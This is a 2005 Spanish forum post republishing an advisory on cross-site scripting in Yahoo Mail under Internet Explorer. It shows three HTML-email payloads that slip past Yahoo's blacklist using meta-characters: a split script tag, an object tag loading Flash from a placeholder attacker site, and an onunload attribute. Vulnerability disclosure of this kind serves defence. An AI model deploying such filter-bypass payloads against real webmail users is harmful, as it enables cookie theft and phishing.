elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 22:49  


Tema destacado: Suscripción al boletín mensual de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Yahoo Mail /MSIE (Microsoft Internet Explorer) XSS (Cross Site Scripting)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Yahoo Mail /MSIE (Microsoft Internet Explorer) XSS (Cross Site Scripting)  (Leído 570 veces)
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Yahoo Mail /MSIE (Microsoft Internet Explorer) XSS (Cross Site Scripting)
« en: 22 Octubre 2005, 22:56 »

Detalles de Vulnerabilidades:

1) XSS/Robo de cookie

El fallo de las blacklist de Yahoo para detectar script-tags en combinacion con caracteres especiales de NULL-Bytes y otros META-Caracteres.
Esto deja a los usuarios del Webmail usando MSIE vulnerables a XSS, troyanos y a los ataques de Phishing.

2) Ejemplos de algunos XSS


Extracto de Correos-HTML:

Código:
SCRIPT-TAG:
----------------------------------------------------------------
HOLA
<s[META-Char]cript>alert("Mousehack Was Here")</s[META-Char]cript>
rrrrrrxxxxx
-----------------------------------------------------------------

Código:
OBJECT-TAG:
-----------------------------------------------------------------
<objec[META-Char]t classid="CLSID:D27CDB6E-AE6D-11cf-96B8-444553540000">

<param name="movie" value="http://[tu_sitio]/yahoo.swf"></obje[META-Char]ct>
------------------------------------------------------------------

Código:
ONUNLOAD-Attribute:
------------------------------------------------------------------
</body><body onun[META-Char]load=alert('Mousehack Was Here')>

somewords
</body></html>
-------------------------------------------------------------------

Solucion:

No usar Internet Explorer

Fuente:securlabs.org

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
INTERNET Y YAHOO
Dudas Generales
chano 1 541 Último mensaje 27 Marzo 2012, 23:03
por silvermist
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines